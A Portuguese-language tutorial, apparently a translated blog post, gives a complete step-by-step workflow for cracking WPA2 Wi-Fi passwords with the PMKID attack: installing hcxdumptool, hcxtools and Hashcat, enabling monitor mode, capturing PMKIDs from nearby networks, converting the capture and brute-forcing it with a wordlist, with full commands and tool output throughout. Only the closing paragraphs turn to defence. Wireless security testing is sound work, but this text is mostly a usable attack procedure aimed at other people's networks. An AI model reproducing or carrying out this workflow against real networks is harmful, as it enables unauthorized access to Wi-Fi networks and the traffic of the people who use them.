šŸ”„Decifrando senhas WPA2 usando o novo ataque PMKID HashcatšŸ”„




Decifrar a senha de redes WPA2 tem sido praticamente o mesmo por muitos anos, mas um ataque mais recente requer menos interação e informações do que as técnicas anteriores e tem a vantagem adicional de ser capaz de direcionar os pontos de acesso sem ninguém conectado. O último ataque contra o PMKID usa Hashcat para quebrar senhas WPA e permite que hackers encontrem redes com senhas fracas mais facilmente.

A maneira antiga de decifrar senhas WPA2

A maneira antiga de crackear WPA2 jÔ existe hÔ algum tempo e envolve a desconexão momentânea de um dispositivo conectado do ponto de acesso que queremos tentar crackear. Isso tem duas desvantagens, que são essenciais para os hackers de Wi-Fi entenderem.

A primeira desvantagem é o requisito de que alguém esteja conectado à rede para atacÔ-la. A senha da rede pode ser fraca e muito fÔcil de quebrar, mas sem um dispositivo conectado para iniciar rapidamente, não hÔ oportunidade de capturar um aperto de mão, portanto, nenhuma chance de tentar quebrÔ-lo.

A segunda desvantagem dessa tÔtica é que ela é barulhenta e legalmente problemÔtica, pois força você a enviar pacotes que desconectam deliberadamente um usuÔrio autorizado de um serviço que ele estÔ pagando para usar. Esse tipo de interferência não autorizada é tecnicamente um ataque de negação de serviço e, se mantido, é equivalente a bloquear uma rede. Isso pode causar problemas e é facilmente detectÔvel por alguns de nossos guias anteriores.

Um novo mƩtodo de quebra de senha

Em vez de depender da interceptação de comunicações bidirecionais entre dispositivos Wi-Fi para tentar quebrar a senha, um invasor pode se comunicar diretamente com um ponto de acesso vulnerÔvel usando o novo método. Em 4 de agosto de 2018, uma postagem no fórum Hashcat detalhou uma nova técnica que aproveita um ataque contra o RSN IE (Robust Security Network Information Element) de um único quadro EAPOL para capturar as informações necessÔrias para tentar um ataque de força bruta.

Semelhante aos ataques anteriores contra WPA, o invasor deve estar próximo à rede que deseja atacar. O objetivo serÔ usar um adaptador de rede sem fio compatível com Kali para capturar as informações necessÔrias da rede para tentar forçar a senha bruta. Em vez de usar Aireplay-ng ou Aircrack-ng, usaremos uma nova ferramenta de ataque sem fio para fazer isso chamada hcxtools .

Usando Hcxtools e Hashcat

Hcxdumptool e hcxpcaptool são ferramentas escritas para auditoria de Wi-Fi e teste de penetração e nos permitem interagir com redes Wi-Fi próximas para capturar handshakes WPA e hashes PMKID. Funciona de forma semelhante ao Besside-ng , pois requer argumentos mínimos para iniciar um ataque a partir da linha de comando, pode ser executado contra alvos específicos ou alvos de conveniência e pode ser executado rapidamente por SSH em um Raspberry Pi ou outro dispositivo sem um tela.

Depois que o PMKID Ć© capturado, a próxima etapa Ć© carregar o hash no Hashcat e tentar quebrar a senha. Ɖ aqui que hcxtools difere de Besside-ng, pois uma etapa de conversĆ£o Ć© necessĆ”ria para preparar o arquivo para Hashcat. Usaremos hcxpcaptool para converter nosso arquivo PCAPNG em um Hashcat com o qual possa trabalhar, deixando apenas a etapa de selecionar uma lista robusta de senhas para suas tentativas de forƧa bruta.

Vale ressaltar que nem todas as redes sĆ£o vulnerĆ”veis ​​a esse ataque. Por ser um campo opcional adicionado por alguns fabricantes, vocĆŖ nĆ£o deve esperar sucesso universal com essa tĆ©cnica. Se vocĆŖ pode capturar o PMKID depende se o fabricante do ponto de acesso lhe fez o favor de incluir um elemento que o inclua, e se vocĆŖ pode quebrar o PMKID capturado depende se a senha subjacente estĆ” contida em sua lista de senhas de forƧa bruta . Se nenhuma das condiƧƵes for atendida, o ataque falharĆ”.

O que vocĆŖ precisarĆ”

Para tentar este ataque, você precisarÔ executar o Kali Linux e ter acesso a um adaptador de rede sem fio que ofereça suporte ao modo de monitor e injeção de pacotes. Temos vÔrios guias sobre como selecionar um adaptador de rede sem fio compatível abaixo.

AlƩm de um adaptador de rede compatƭvel com Kali , certifique-se de ter atualizado e atualizado totalmente o seu sistema. Caso contrƔrio, alguns pacotes podem estar desatualizados e causar problemas durante a captura.

Passo 1Instale Hxctools e Hashcat

Primeiro, vamos instalar as ferramentas de que precisamos. Para baixĆ”-los, digite o seguinte em uma janela de terminal.

~# git clone https://github.com/ZerBea/hcxdumptool.git

Cloning into 'hcxdumptool'...
remote: Enumerating objects: 133, done.
remote: Counting objects: 100% (133/133), done.
remote: Compressing objects: 100% (97/97), done.
remote: Total 2127 (delta 82), reused 76 (delta 36), pack-reused 1994
Receiving objects: 100% (2127/2127), 759.53 KiB | 1.79 MiB/s, done.
Resolving deltas: 100% (1434/1434), done.

Em seguida, mude para o diretório e conclua a instalação com make e make install .

~# cd hcxdumptool
~/hcxdumptool# make

cc -O3 -Wall -Wextra -std=gnu99  -o hcxpioff hcxpioff.c
cc -O3 -Wall -Wextra -std=gnu99  -o hcxdumptool hcxdumptool.c  -lcrypto

~/hcxdumptool# make install

cc -O3 -Wall -Wextra -std=gnu99  -o hcxpioff hcxpioff.c
cc -O3 -Wall -Wextra -std=gnu99  -o hcxdumptool hcxdumptool.c  -lcrypto
install -m 0755 -D hcxpioff /usr/local/bin/hcxpioff
install -m 0755 -D hcxdumptool /usr/local/bin/hcxdumptool
rm -f hcxpioff
rm -f hcxdumptool
rm -f *.o *~

Quando terminar a instalação, passaremos para a instalação do hxctools. Para fazer isso, abra uma nova janela de terminal ou saia do diretório / hexdumptool e instale o hxctools.

~/hcxdumptool#cd
~# git clone https://github.com/ZerBea/hcxtools.git

Cloning into 'hcxtools'...
remote: Enumerating objects: 120, done.
remote: Counting objects: 100% (120/120), done.
remote: Compressing objects: 100% (82/82), done.
remote: Total 6196 (delta 77), reused 79 (delta 38), pack-reused 6076
Receiving objects: 100% (6196/6196), 1.89 MiB | 5.02 MiB/s, done.
Resolving deltas: 100% (4320/4320), done.

Em seguida, mude para seu diretório e execute make e make install como antes. Se você receber um erro, tente digitar sudo antes do comando.

~# cd hcxtools
~/hcxtools# make

mkdir -p .deps
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxpcapngtool.d -o hcxpcapngtool hcxpcapngtool.c -lz -lcrypto
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxhashtool.d -o hcxhashtool hcxhashtool.c -lcrypto -lcurl
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxpsktool.d -o hcxpsktool hcxpsktool.c -lcrypto
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxwltool.d -o hcxwltool hcxwltool.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlancap2wpasec.d -o wlancap2wpasec wlancap2wpasec.c -lcurl
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/whoismac.d -o whoismac whoismac.c -lcurl
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxpmkidtool.d -o hcxpmkidtool hcxpmkidtool.c -lcrypto -lpthread
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlanhcx2john.d -o wlanhcx2john wlanhcx2john.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxpcaptool.d -o hcxpcaptool hcxpcaptool.c -lz -lcrypto
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxhashcattool.d -o hcxhashcattool hcxhashcattool.c -lcrypto -lpthread
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxmactool.d -o hcxmactool hcxmactool.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxessidtool.d -o hcxessidtool hcxessidtool.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxhash2cap.d -o hcxhash2cap hcxhash2cap.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlanhc2hcx.d -o wlanhc2hcx wlanhc2hcx.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlanwkp2hcx.d -o wlanwkp2hcx wlanwkp2hcx.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlanhcxinfo.d -o wlanhcxinfo wlanhcxinfo.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlanhcx2ssid.d -o wlanhcx2ssid wlanhcx2ssid.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlanhcxcat.d -o wlanhcxcat wlanhcxcat.c -lcrypto
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlanpmk2hcx.d -o wlanpmk2hcx wlanpmk2hcx.c -lcrypto
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlanjohn2hcx.d -o wlanjohn2hcx wlanjohn2hcx.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlancow2hcxpmk.d -o wlancow2hcxpmk wlancow2hcxpmk.c

~/hcxtools# make install

install -m 0755 -D hcxpcapngtool /usr/local/bin/hcxpcapngtool
install -m 0755 -D hcxhashtool /usr/local/bin/hcxhashtool
install -m 0755 -D hcxpsktool /usr/local/bin/hcxpsktool
install -m 0755 -D hcxwltool /usr/local/bin/hcxwltool
install -m 0755 -D wlancap2wpasec /usr/local/bin/wlancap2wpasec
install -m 0755 -D whoismac /usr/local/bin/whoismac
install -m 0755 -D hcxpmkidtool /usr/local/bin/hcxpmkidtool
install -m 0755 -D wlanhcx2john /usr/local/bin/wlanhcx2john
install -m 0755 -D hcxpcaptool /usr/local/bin/hcxpcaptool
install -m 0755 -D hcxhashcattool /usr/local/bin/hcxhashcattool
install -m 0755 -D hcxmactool /usr/local/bin/hcxmactool
install -m 0755 -D hcxessidtool /usr/local/bin/hcxessidtool
install -m 0755 -D hcxhash2cap /usr/local/bin/hcxhash2cap
install -m 0755 -D wlanhc2hcx /usr/local/bin/wlanhc2hcx
install -m 0755 -D wlanwkp2hcx /usr/local/bin/wlanwkp2hcx
install -m 0755 -D wlanhcxinfo /usr/local/bin/wlanhcxinfo
install -m 0755 -D wlanhcx2ssid /usr/local/bin/wlanhcx2ssid
install -m 0755 -D wlanhcxcat /usr/local/bin/wlanhcxcat
install -m 0755 -D wlanpmk2hcx /usr/local/bin/wlanpmk2hcx
install -m 0755 -D wlanjohn2hcx /usr/local/bin/wlanjohn2hcx
install -m 0755 -D wlancow2hcxpmk /usr/local/bin/wlancow2hcxpmk

Por fim, precisaremos instalar o Hashcat, o que deve ser fÔcil, pois estÔ incluído no repositório Kali Linux por padrão. Basta digitar o seguinte para instalar a versão mais recente do Hashcat.

~/hcxtools# cd
~# apt install hashcat

Reading package lists... Done
Building dependency tree
Reading state information... Done
hashcat is already the newest version (5.1.0+ds1-1).
The following packages were automatically installed and are no longer required:
  libdouble-conversion1 liblinear3
Use 'apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 1863 not upgraded.

Com isso concluído, podemos prosseguir para a configuração do adaptador de rede sem fio.

Passo 2Prepare o adaptador de rede sem fio

Depois de conectar seu adaptador de rede sem fio compatível com Kali, você pode encontrar o nome digitando ifconfig ou ip a . Normalmente, ele serÔ denominado algo como wlan0. O primeiro passo serÔ colocar o cartão no modo de monitor sem fio, permitindo-nos ouvir o trÔfego Wi-Fi nas proximidades.

Para fazer isso, digite o seguinte comando em uma janela de terminal, substituindo o nome do seu adaptador de rede sem fio por wlan0.

~# airmon-ng start wlan0

Found 3 processes that could cause trouble
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

 PID Name
 555 NetworkManager
 611 wpa_supplicant
6636 dhclient

PHY     Interface   Driver      Chipset

phy0    wlan0       ath9k       Qualcomm Atheros QCA9565 / AR9565 Wireless Network Adapter (rev 01)

                (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
                (mac80211 station mode vif disabled for [phy0]wlan0)
phy1    wlan1       ath9k_htc   Atheros Communications, Inc. AR9271 802.11n

Agora, seu adaptador de rede sem fio deve ter um nome como "wlan0mon" e estar no modo monitor. VocĆŖ pode confirmar isso executando ifconfig novamente.

etapa 3Use Hxcdump para capturar PMKIDs de redes locais

Agora estamos prontos para capturar os PMKIDs dos dispositivos que queremos tentar atacar. Com nosso adaptador de rede sem fio no modo de monitor como "wlan1mon", executaremos o seguinte comando para iniciar o ataque.

~# hcxdumptool -i wlan1mon -o galleria.pcapng --enable__status=1

Dividindo isso, -i informa ao programa qual interface estamos usando, neste caso, wlan1mon. O nome do arquivo no qual salvaremos os resultados pode ser especificado com o argumento -o sinalizador. O canal que queremos fazer a varredura pode ser indicado com o sinalizador -c seguido pelo nĆŗmero do canal a fazer a varredura.

Em nosso comando acima, estamos usando wlan1mon para salvar PMKIDs capturados em um arquivo chamado "galleria.pcapng." Embora você possa especificar outro valor de status , não tive sucesso na captura com nenhum valor, exceto 1 .

warning: NetworkManager is running with pid 555
warning: wpa_supplicant is running with pid 611
warning: wlan1mon is probably a monitor interface

start capturing (stop with ctrl+c)
INTERFACE:...............: wlan1mon
FILTERLIST...............: 0 entries
MAC CLIENT...............: fcc233ca8bc5
MAC ACCESS POINT.........: 10ae604b9e82 (incremented on every new client)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 62439
ANONCE...................: d8dd2206c82ad030e843a39e8f99281e215492dbef56f693cd882d4dfcde9956

[22:17:32 - 001] c8b5adb615ea -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:32 - 001] c8b5adb615e9 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:33 - 001] 2c95694f3ca0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:33 - 001] 2c95694f3ca0 -> b4b686abc81a [FOUND PMKID]
[22:17:48 - 011] 14edbb9938ea -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:48 - 011] 88964e3a8ea0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:49 - 011] dc7fa425888a -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:51 - 011] 88964e801fa0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:57 - 001] 9822efc6fdff -> ba634d3eb80d [EAPOL 4/4 - M4 RETRY ATTACK]
[22:17:57 - 001] 9822efc6fdff -> ba634d3eb80d [FOUND HANDSHAKE AP-LESS, EAPOL TIMEOUT 6696]
[22:18:04 - 011] 803773defd01 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:19:21 - 011] 14edbb9ba0e6 -> 803773defd01 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 15247]
[22:19:34 - 006] 0618d629465b -> 58fb8433aac2 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 2832]
[22:19:42 - 005] e0220203294e -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:19:57 - 011] 14edbb9ba0e6 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:20:02 - 008] 14edbbd29326 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:20:04 - 008] 1c872c707c60 -> 78e7d17791e7 [FOUND PMKID]
[22:20:11 - 009] e0220453a576 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:20:27 - 001] ace2d32602da -> c8665d5dd654 [FOUND HANDSHAKE AP-LESS, EAPOL TIMEOUT 5202]
INFO: cha=2, rx=32752, rx(dropped)=2801, tx=2205, powned=18, err=0

Quando tiver reunido o suficiente, você pode interromper o programa digitando Control-C para encerrar o ataque. Isso deve produzir um arquivo PCAPNG contendo as informações de que precisamos para tentar um ataque de força bruta, mas precisaremos convertê-lo em um formato que o Hashcat possa entender.

Passo 4Use Hxcpcaptool para converter o despejo para Hashcat

Para converter nosso arquivo PCAPNG, usaremos hcxpcaptool com alguns argumentos especificados. Na mesma pasta em que o arquivo .PCAPNG foi salvo, execute o seguinte comando em uma janela de terminal.

~# hcxpcaptool -E essidlist -I identitylist -U usernamelist -z galleriaHC.16800 galleria.pcapng

Este comando estÔ dizendo ao hxcpcaptool para usar as informações incluídas no arquivo para ajudar o Hashcat a entendê-lo com os sinalizadores -E , -I e -U . O sinalizador -Z é usado para o nome do arquivo recém-convertido para o Hashcat usar, e a última parte do comando é o arquivo PCAPNG que queremos converter.

A execução do comando deve nos mostrar o seguinte.

summary:
--------
file name....................: galleria.pcapng
file type....................: pcapng 1.0
file hardware information....: x86_64
file os information..........: Linux 4.18.0-kali2-amd64
file application information.: hcxdumptool 4.2.1
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 1089
skipped packets..............: 0
packets with GPS data........: 0
packets with FCS.............: 732
beacons (with ESSID inside)..: 49
probe requests...............: 26
probe responses..............: 40
association requests.........: 103
association responses........: 204
reassociation requests.......: 2
reassocaition responses......: 7
authentications (OPEN SYSTEM): 346
authentications (BROADCOM)...: 114
authentications (APPLE)......: 1
EAPOL packets................: 304
EAPOL PMKIDs.................: 21
best handshakes..............: 4 (ap-less: 1)

21 PMKID(s) written to galleriahC.16800

Aqui, podemos ver que reunimos 21 PMKIDs em um curto espaƧo de tempo. Agora podemos usar o arquivo "galleriaHC.16800" no Hashcat para tentar quebrar as senhas da rede.

Etapa 5Selecione uma lista de senha e forƧa bruta com Hashcat

Para começar a atacar os hashes que capturamos, precisaremos escolher uma boa lista de senhas. Você pode encontrar vÔrias listas de senhas boas para começar de novo na coleção SecList . Assim que tiver uma lista de senhas, coloque-a na mesma pasta do arquivo .16800 que você acabou de converter e execute o seguinte comando em uma janela de terminal.

~# hashcat -m 16800 galleriaHC.16800 -a 0 --kernel-accel=1 -w 4 --force 'topwifipass.txt'

Neste comando, estamos iniciando o Hashcat no modo 16800 , que Ć© para atacar os protocolos de rede WPA-PMKID-PBKDF2. A seguir, especificaremos o nome do arquivo que queremos quebrar, neste caso, "galleriaHC.16800." O sinalizador -a nos informa quais tipos de ataque usar, neste caso, um ataque "direto" e, em seguida, os sinalizadores -w e --kernel-accel = 1 especificam o perfil de carga de trabalho de maior desempenho. Se o seu computador apresentar problemas de desempenho, vocĆŖ pode diminuir o nĆŗmero no argumento -w .

Em seguida, a opção --force ignora quaisquer avisos para prosseguir com o ataque, e a última parte do comando especifica a lista de senhas que estamos usando para tentar forçar bruta os PMKIDs em nosso arquivo, neste caso, chamado "topwifipass. TXT."

hashcat (v4.2.1) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-AMD A8-6410 APU with AMD Radeon R5 Graphics, 2553/2553 MB allocatable, 4MCU

Hashes: 21 digests; 21 unique digests, 20 unique salts

Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Slow-Hash-SIMD-LOOP

Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

* Device #1: build_opts '-cl-std=CL1.1 -I OpenCL -I /usr/share/hashcat/OpenCL -D VENDOR ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=4 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=16800 -D _unroll'
Dictionary cache hit:

* Filename..: topwifipass.txt
* Passwords.: 4801
* Bytes.....: 45277
* Keyspace..: 4801

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>

Dependendo da velocidade do hardware e do tamanho da lista de senhas, isso pode levar algum tempo para ser concluído. Para ver o status a qualquer momento, você pode pressionar a tecla S para uma atualização.

Etapa 6Interprete os resultados

Conforme o Hashcat é quebrado, você poderÔ verificar conforme ele avança para ver se alguma chave foi recuperada.

Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: galleriaHC.16800
Time.Started.....: Sun Oct 28 22:32:57 2018 (7 mins, 50 secs)
Time.Estimated...: Sun Oct 28 22:57:50 2018 (17 mins, 3 secs)
Guess.Base.......: File (topwifipass.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:      64 H/s (15.43ms) @ Accel:1 Loops:1024 Thr:1 Vec:4
Recovered........: 0/21 (0.00%) Digests, 0/20 (0.00%) Salts
Progress.........: 30180/96020 (31.43%)
Rejected.........: 0/30180 (0.00%)
Restore.Point....: 1508/4801 (31.41%)
Candidates.#1....: peter123 -> moneyman
HWon.Dev.#1......: N/A

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>

Session..........: hashcat
Status...........: Running
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: galleriaHC.16800
Time.Started.....: Sun Oct 28 22:32:57 2018 (19 mins, 56 secs)
Time.Estimated...: Sun Oct 28 22:57:54 2018 (5 mins, 3 secs)
Guess.Base.......: File (topwifipass.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:      64 H/s (15.24ms) @ Accel:1 Loops:1024 Thr:1 Vec:4
Recovered........: 0/21 (0.00%) Digests, 0/20 (0.00%) Salts
Progress.........: 76736/96020 (79.92%)
Rejected.........: 0/76736 (0.00%)
Restore.Point....: 3836/4801 (79.90%)
Candidates.#1....: monopoli -> mercenary
HWon.Dev.#1......: N/A

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>

Quando a lista de senhas estiver chegando ao fim, o Hashcat ajustarÔ automaticamente a carga de trabalho e fornecerÔ um relatório final quando estiver concluído.

Approaching final keyspace - workload adjusted.

Session..........: hashcat
Status...........: Exhausted
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: hotspotcap.16800
Time.Started.....: Sun Oct 28 18:05:57 2018 (3 mins, 49 secs)
Time.Estimated...: Sun Oct 28 18:09:46 2018 (0 secs)
Guess.Base.......: File (topwifipass.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:      42 H/s (15.56ms) @ Accel:1 Loops:1024 Thr:1 Vec:4
Recovered........: 0/2 (0.00%) Digests, 0/2 (0.00%) Salts
Progress.........: 9602/9602 (100.0%)
Rejected.........: 2/9602 (0.02%)
Restore.Point....: 4801/4801 (100.0%)
Candidates.#1....: 159159159 -> 00001111
HWon.Dev.#1......: N/A

Started: Sun Oct 28 18:05:56 2018
Stopped: Sun Oct 28 18:09:49 2018

Se você conseguiu decifrar alguma senha, você as verÔ aqui. Em nosso teste, nenhum dos PMKIDs que coletamos continha senhas em nossa lista de senhas, portanto, não foi possível quebrar nenhum dos hashes. Este provavelmente serÔ o seu resultado também em qualquer rede com uma senha forte, mas espere ver resultados aqui para redes que usam uma senha fraca.

O PMKID Hashcat Attack torna os ataques por Wi-Fi mais fƔceis

Embora o novo ataque contra senhas de Wi-Fi torne mais fÔcil para os hackers tentarem um ataque a um alvo, os mesmos métodos que eram eficazes contra os tipos anteriores de cracking WPA permanecem eficazes. Se sua rede nem mesmo oferece suporte ao elemento de segurança robusto que contém o PMKID, esse ataque não tem chance de sucesso. Você pode auditar sua própria rede com hcxtools para ver se ela é suscetível a esse ataque.

Mesmo que sua rede seja vulnerƔvel, uma senha forte ainda Ʃ a melhor defesa contra um invasor que obtenha acesso Ơ sua rede Wi-Fi usando este ou outro ataque de quebra de senha.

Como esses ataques dependem de adivinhar a senha que a rede Wi-Fi estÔ usando, existem duas fontes comuns de adivinhações; A primeira são os usuÔrios que escolhem senhas padrão ou extremamente ruins , como "12345678" ou "senha". Eles serão facilmente quebrados. A segunda fonte de suposições de senha vem de violações de dados que revelam milhões de senhas de usuÔrios reais . Como muitos usuÔrios reutilizam senhas entre diferentes tipos de contas, essas listas tendem a ser muito eficazes para violar redes Wi-Fi.

Enviar um comentƔrio

0 ComentƔrios